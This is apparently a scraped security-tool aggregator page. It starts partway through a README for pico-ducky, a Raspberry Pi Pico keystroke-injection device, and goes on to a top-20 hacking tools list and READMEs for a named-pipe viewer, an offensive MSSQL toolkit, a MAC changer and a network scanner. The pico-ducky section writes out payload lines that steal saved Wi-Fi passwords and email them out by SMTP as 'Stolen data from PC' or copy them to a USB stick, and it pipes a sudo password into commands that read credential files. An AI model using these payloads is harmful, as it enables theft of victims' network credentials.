    • Jumper Wire (optional)
    • pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
    • USB flash drive (for the exploit over physical medium only)


    Note:

    • It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.

    • However, while pico-ducky is a good and budget-friedly solution, Rubber Ducky does offer things like stealthiness and usage of the lastest DuckyScript version.

    • In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.

    Keystroke injection tool

    Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.

    Keystroke injection

    The payload uses STRING command processes keystroke for injection. It accepts one or more alphanumeric/punctuation characters and will type the remainder of the line exactly as-is into the target machine. The ENTER/SPACE will simulate a press of keyboard keys.

    Delays

    We use DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a Command Line to load. Delay is useful when used at the very beginning when a new USB device is connected to a targeted computer. Initially, the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs setup time is very short. In most cases, it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.

    Exfiltration

    Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, adversary can package it to avoid detection while sending data over the network, using encryption or compression. Two most common way of exfiltration are:

    • Exfiltration over the network medium.
      • This approach was used for the Windows exploit. The whole payload can be seen here.

    • Exfiltration over a physical medium.
      • This approach was used for the Linux exploit. The whole payload can be seen here.

    Windows exploit

    In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

    Sending stolen data over email

    Once passwords have been exported to the .txt file, payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit a following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and yours email PASSWORD. In addition, you could also update the body and the subject of the email.

    STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587

    Note:

    • After sending data over the email, the .txt file is deleted.

    • You can also use some an SMTP from another email provider, but you should be mindful of SMTP server and port number you will write in the payload.

    • Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.

    Linux exploit

    In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.

    Storing stolen data to USB flash drive

    Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

    STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt

    STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt

    In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

    STRING echo PASSWORD | sudo -S echo

    STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"

    Bash script

    In order to run the wifi_passwords_print.sh script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:

    echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK

    where PASSWORD is your account's password and USBSTICK is the name for your USB device.

    Quick overview of the payload

    NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses .ini-style keyfile format and stores network configuration profiles. The keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with regex in order to extract data of interest. For file filtering, a modified positive lookbehind assertion was used ((?<=keyword)). While the positive lookbehind assertion will match at a certain position in the string, sc. at a position right after the keyword without making that text itself part of the match, the regex (?<=keyword).* will match any text after the keyword. This allows the payload to match the values after SSID and psk (pre-shared key) keywords.

    For more information about NetworkManager here is some useful links:

    Exfiltrated data formatting

    Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

    Wireless_Network_Name Password
    --------------------- --------
    WLAN1 pass1
    WLAN2 pass2
    WLAN3 pass3

    USB Mass Storage Device Problem

    One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees it as a USB keyboard. This isn't a default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.

    Tip:

    • Upload your payload to RPi Pico before you connect the pins.
    • Don't solder the pins because you will probably want to change/update the payload at some point.

    Payload Writer

    When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, a name of the OS (windows or linux) and the name of the payload file (e.q. payload1.dd). Below you can find an example how to run the writer script when creating a Windows payload.

    python3 writer.py windows payload1.dd

    Limitations/Drawbacks

    • This pico-ducky currently works only on Windows OS.

    • This attack requires physical access to an unlocked device in order to be successfully deployed.

    • The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admins password for the Linux machine.

    • Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

    • Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

    • The pico-ducky device isn't really stealthy, actually it's quite the opposite, it's really bulky especially if you solder the pins.

    • Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.

    • If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

    • If the computer has a non-English Environment set, this exploit won't be successful.

    • Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

    To-Do List

    • Fix Caps Lock bug.
    • Fix non-English Environment bug.
    • Obfuscate the command prompt.
    • Implement exfiltration over a physical medium.
    • Create a payload for Linux.
    • Encode/Encrypt exfiltrated data before sending it over email.
    • Implement indicator of successfully completed exploit.
    • Implement command history clean-up for Linux exploit.
    • Enhance the Linux exploit in order to avoid usage of sudo.


    Top 20 Most Popular Hacking Tools in 2023

    By: Zion3R

    As last year, this year we made a ranking with the most popular tools between January and December 2023.

    The tools of this year encompass a diverse range of cybersecurity disciplines, including AI-Enhanced Penetration Testing, Advanced Vulnerability Management, Stealth Communication Techniques, Open-Source General Purpose Vulnerability Scanning, and more.

    Without going into further details, we have prepared a useful list of the most popular tools in Kitploit 2023:


    1. PhoneSploit-Pro - An All-In-One Hacking Tool To Remotely Exploit Android Devices Using ADB And Metasploit-Framework To Get A Meterpreter Session


    2. Gmailc2 - A Fully Undetectable C2 Server That Communicates Via Google SMTP To Evade Antivirus Protections And Network Traffic Restrictions


    3. Faraday - Open Source Vulnerability Management Platform


    4. CloakQuest3r - Uncover The True IP Address Of Websites Safeguarded By Cloudflare


    5. Killer - Is A Tool Created To Evade AVs And EDRs Or Security Tools


    6. Geowifi - Search WiFi Geolocation Data By BSSID And SSID On Different Public Databases


    7. Waf-Bypass - Check Your WAF Before An Attacker Does


    8. PentestGPT - A GPT-empowered Penetration Testing Tool


    9. Sirius - First Truly Open-Source General Purpose Vulnerability Scanner


    10. LSMS - Linux Security And Monitoring Scripts


    11. GodPotato - Local Privilege Escalation Tool From A Windows Service Accounts To NT AUTHORITY\SYSTEM


    12. Bypass-403 - A Simple Script Just Made For Self Use For Bypassing 403


    13. ThunderCloud - Cloud Exploit Framework


    14. GPT_Vuln-analyzer - Uses ChatGPT API And Python-Nmap Module To Use The GPT3 Model To Create Vulnerability Reports Based On Nmap Scan Data


    15. Kscan - Simple Asset Mapping Tool


    16. RedTeam-Physical-Tools - Red Team Toolkit - A Curated List Of Tools That Are Commonly Used In The Field For Physical Security, Red Teaming, And Tactical Covert Entry


    17. DNSWatch - DNS Traffic Sniffer and Analyzer


    18. IpGeo - Tool To Extract IP Addresses From Captured Network Traffic File


    19. TelegramRAT - Cross Platform Telegram Based RAT That Communicates Via Telegram To Evade Network Restrictions


    20. XSS-Exploitation-Tool - An XSS Exploitation Tool





    Happy New Year wishes the KitPloit team!


    PipeViewer - A Tool That Shows Detailed Information About Named Pipes In Windows

    By: Zion3R


    A GUI tool for viewing Windows Named Pipes and searching for insecure permissions.

    The tool was published as part of a research about Docker named pipes:
    "Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation – Part 1"
    "Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation – Part 2"

    Overview

    PipeViewer is a GUI tool that allows users to view details about Windows Named pipes and their permissions. It is designed to be useful for security researchers who are interested in searching for named pipes with weak permissions or testing the security of named pipes. With PipeViewer, users can easily view and analyze information about named pipes on their systems, helping them to identify potential security vulnerabilities and take appropriate steps to secure their systems.


    Usage

    Double-click the EXE binary and you will get the list of all named pipes.

    Build

    We used Visual Studio to compile it.
    When downloading it from GitHub you might get error of block files, you can use PowerShell to unblock them:

    Get-ChildItem -Path 'D:\tmp\PipeViewer-main' -Recurse | Unblock-File

    Warning

    We built the project and uploaded it so you can find it in the releases.
    One problem is that the binary will trigger alerts from Windows Defender because it uses the NtObjerManager package which is flagged as virus.
    Note that James Forshaw talked about it here.
    We can't change it because we depend on third-party DLL.

    Features

    • A detailed overview of named pipes.
    • Filter\highlight rows based on cells.
    • Bold specific rows.
    • Export\Import to\from JSON.
    • PipeChat - create a connection with available named pipes.

    Demo

    PipeViewer3_v1.0.mp4

    Credit

    We want to thank James Forshaw (@tyranid) for creating the open source NtApiDotNet which allowed us to get information about named pipes.

    License

    Copyright (c) 2023 CyberArk Software Ltd. All rights reserved
    This repository is licensed under Apache-2.0 License - see LICENSE for more details.

    References

    For more comments, suggestions or questions, you can contact Eviatar Gerzi (@g3rzi) and CyberArk Labs.



    PySQLRecon - Offensive MSSQL Toolkit Written In Python, Based Off SQLRecon

    By: Zion3R


    PySQLRecon is a Python port of the awesome SQLRecon project by @sanjivkawa. See the commands section for a list of capabilities.


    Install

    PySQLRecon can be installed with pip3 install pysqlrecon or by cloning this repository and running pip3 install .

    Commands

    All of the main modules from SQLRecon have equivalent commands. Commands noted with [PRIV] require elevated privileges or sysadmin rights to run. Alternatively, commands marked with [NORM] can likely be run by normal users and do not require elevated privileges.

    Support for impersonation ([I]) or execution on linked servers ([L]) are denoted at the end of the command description.

    adsi                 [PRIV] Obtain ADSI creds from ADSI linked server [I,L]
    agentcmd [PRIV] Execute a system command using agent jobs [I,L]
    agentstatus [PRIV] Enumerate SQL agent status and jobs [I,L]
    checkrpc [NORM] Enumerate RPC status of linked servers [I,L]
    clr [PRIV] Load and execute .NET assembly in a stored procedure [I,L]
    columns [NORM] Enumerate columns within a table [I,L]
    databases [NORM] Enumerate databases on a server [I,L]
    disableclr [PRIV] Disable CLR integration [I,L]
    disableole [PRIV] Disable OLE automation procedures [I,L]
    disablerpc [PRIV] Disable RPC and RPC Out on linked server [I]
    disablexp [PRIV] Disable xp_cmdshell [I,L]
    enableclr [PRIV] Enable CLR integration [I,L]
    enableole [PRIV] Enable OLE automation procedures [I,L]
    enablerpc [PRIV] Enable RPC and RPC Out on linked server [I]
    enablexp [PRIV] Enable xp_cmdshell [I,L]
    impersonate [NORM] Enumerate users that can be impersonated
    info [NORM] Gather information about the SQL server
    links [NORM] Enumerate linked servers [I,L]
    olecmd [PRIV] Execute a system command using OLE automation procedures [I,L]
    query [NORM] Execute a custom SQL query [I,L]
    rows [NORM] Get the count of rows in a table [I,L]
    search [NORM] Search a table for a column name [I,L]
    smb [NORM] Coerce NetNTLM auth via xp_dirtree [I,L]
    tables [NORM] Enu merate tables within a database [I,L]
    users [NORM] Enumerate users with database access [I,L]
    whoami [NORM] Gather logged in user, mapped user and roles [I,L]
    xpcmd [PRIV] Execute a system command using xp_cmdshell [I,L]

    Usage

    PySQLRecon has global options (available to any command), with some commands introducing additional flags. All global options must be specified before the command name:

    pysqlrecon [GLOBAL_OPTS] COMMAND [COMMAND_OPTS]

    View global options:

    pysqlrecon --help

    View command specific options:

    pysqlrecon [GLOBAL_OPTS] COMMAND --help

    Change the database authenticated to, or used in certain PySQLRecon commands (query, tables, columns rows), with the --database flag.

    Target execution of a PySQLRecon command on a linked server (instead of the SQL server being authenticated to) using the --link flag.

    Impersonate a user account while running a PySQLRecon command with the --impersonate flag.

    --link and --impersonate and incompatible.

    Development

    pysqlrecon uses Poetry to manage dependencies. Install from source and setup for development with:

    git clone https://github.com/tw1sm/pysqlrecon
    cd pysqlrecon
    poetry install
    poetry run pysqlrecon --help

    Adding a Command

    PySQLRecon is easily extensible - see the template and instructions in resources

    TODO

    • Add SQLRecon SCCM commands
    • Add Azure SQL DB support?

    References and Credits



    MacMaster - MAC Address Changer

    By: Zion3R


    MacMaster is a versatile command line tool designed to change the MAC address of network interfaces on your system. It provides a simple yet powerful solution for network anonymity and testing.

    Features

    • Custom MAC Address: Set a specific MAC address to your network interface.
    • Random MAC Address: Generate and set a random MAC address.
    • Reset to Original: Reset the MAC address to its original hardware value.
    • Custom OUI: Set a custom Organizationally Unique Identifier (OUI) for the MAC address.
    • Version Information: Easily check the version of MacMaster you are using.

    Installation

    MacMaster requires Python 3.6 or later.

    1. Clone the repository:
      $ git clone https://github.com/HalilDeniz/MacMaster.git
    2. Navigate to the cloned directory:
      cd MacMaster
    3. Install the package:
      $ python setup.py install

    Usage

    $ macmaster --help         
    usage: macmaster [-h] [--interface INTERFACE] [--version]
    [--random | --newmac NEWMAC | --customoui CUSTOMOUI | --reset]

    MacMaster: Mac Address Changer

    options:
    -h, --help show this help message and exit
    --interface INTERFACE, -i INTERFACE
    Network interface to change MAC address
    --version, -V Show the version of the program
    --random, -r Set a random MAC address
    --newmac NEWMAC, -nm NEWMAC
    Set a specific MAC address
    --customoui CUSTOMOUI, -co CUSTOMOUI
    Set a custom OUI for the MAC address
    --reset, -rs Reset MAC address to the original value

    Arguments

    • --interface, -i: Specify the network interface.
    • --random, -r: Set a random MAC address.
    • --newmac, -nm: Set a specific MAC address.
    • --customoui, -co: Set a custom OUI for the MAC address.
    • --reset, -rs: Reset MAC address to the original value.
    • --version, -V: Show the version of the program.
    1. Set a specific MAC address:
      $ macmaster.py -i eth0 -nm 00:11:22:33:44:55
    2. Set a random MAC address:
      $ macmaster.py -i eth0 -r
    3. Reset MAC address to its original value:
      $ macmaster.py -i eth0 -rs
    4. Set a custom OUI:
      $ macmaster.py -i eth0 -co 08:00:27
    5. Show program version:
      $ macmaster.py -V

    Replace eth0 with your desired network interface.

    Note

    You must run this script as root or use sudo to run this script for it to work properly. This is because changing a MAC address requires root privileges.

    Contributing

    Contributions are welcome! To contribute to MacMaster, follow these steps:

    1. Fork the repository.
    2. Create a new branch for your feature or bug fix.
    3. Make your changes and commit them.
    4. Push your changes to your forked repository.
    5. Open a pull request in the main repository.

    Contact

    For any inquiries or further information, you can reach me through the following channels:

    Contact



    NetProbe - Network Probe

    By: Zion3R


    NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.

    Features

    • Scan for devices on a specified IP address or subnet
    • Display the IP address, MAC address, manufacturer, and device model of discovered devices
    • Live tracking of devices (optional)
    • Save scan results to a file (optional)
    • Filter by manufacturer (e.g., 'Apple') (optional)
    • Filter by IP range (e.g., '192.168.1.0/24') (optional)
    • Scan rate in seconds (default: 5) (optional)

    Download

    You can download the program from the GitHub page.

    $ git clone https://github.com/HalilDeniz/NetProbe.git

    Installation

    To install the required libraries, run the following command:

    $ pip install -r requirements.txt

    Usage

    To run the program, use the following command:

    $ python3 netprobe.py [-h] -t  [...] -i  [...] [-l] [-o] [-m] [-r] [-s]
    • -h,--help: show this help message and exit
    • -t,--target: Target IP address or subnet (default: 192.168.1.0/24)
    • -i,--interface: Interface to use (default: None)
    • -l,--live: Enable live tracking of devices
    • -o,--output: Output file to save the results
    • -m,--manufacturer: Filter by manufacturer (e.g., 'Apple')
    • -r,--ip-range: Filter by IP range (e.g., '192.168.1.0/24')
    • -s,--scan-rate: Scan rate in seconds (default: 5)

    Example:

    $ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l

    Help Menu

    Scanner Tool options: -h, --help show this help message and exit -t [ ...], --target [ ...] Target IP address or subnet (default: 192.168.1.0/24) -i [ ...], --interface [ ...] Interface to use (default: None) -l, --live Enable live tracking of devices -o , --output Output file to save the results -m , --manufacturer Filter by manufacturer (e.g., 'Apple') -r , --ip-range Filter by IP range (e.g., '192.168.1.0/24') -s , --scan-rate Scan rate in seconds (default: 5) " dir="auto">
    $ python3 netprobe.py --help                      
    usage: netprobe.py [-h] -t [...] -i [...] [-l] [-o] [-m] [-r] [-s]

    NetProbe: Network Scanner Tool

    options:
    -h, --help show this help message and exit
    -t [ ...], --target [ ...]
    Target IP address or subnet (default: 192.168.1.0/24)
    -i [ ...], --interface [ ...]
    Interface to use (default: None)
    -l, --live Enable live tracking of devices
    -o , --output Output file to save the results
    -m , --manufacturer Filter by manufacturer (e.g., 'Apple')
    -r , --ip-range Filter by IP range (e.g., '192.168.1.0/24')
    -s , --scan-rate Scan rate in seconds (default: 5)

    Default Scan

    $ python3 netprobe.py 

    Live Tracking

    You can enable live tracking of devices on your network by using the -l or --live flag. This will continuously update the device list every 5 seconds.

    $ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l

    Save Results

    You can save the scan results to a file by using the -o or --output flag followed by the desired output file name.

    $ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l -o results.txt
    ┏━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
    ┃ IP Address   ┃ MAC Address       ┃ Packet Size ┃ Manufacturer                 ┃
    ┡━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
    │ 192.168.1.1  │ **:6e:**:97:**:28 │ 102         │ ASUSTek COMPUTER INC.        │
    │ 192.168.1.3  │ 00:**:22:**:12:** │ 102         │ InPro Comm                   │
    │ 192.168.1.2  │ **:32:**:bf:**:00 │ 102         │ Xiaomi Communications Co Ltd │
    │ 192.168.1.98 │ d4:**:64:**:5c:** │ 102         │ ASUSTek COMPUTER INC.        │
    │ 192.168.1.25 │ **:49:**:00:**:38 │ 102         │ Unknown                      │
    └──────────────┴───────────────────┴─────────────┴──────────────────────────────┘
    

    Contact

    If you have any questions, suggestions, or feedback about the program, please feel free to reach out to me through any of the following platforms:

    License

    This program is released under the MIT LICENSE. See LICENSE for more information.



    ❌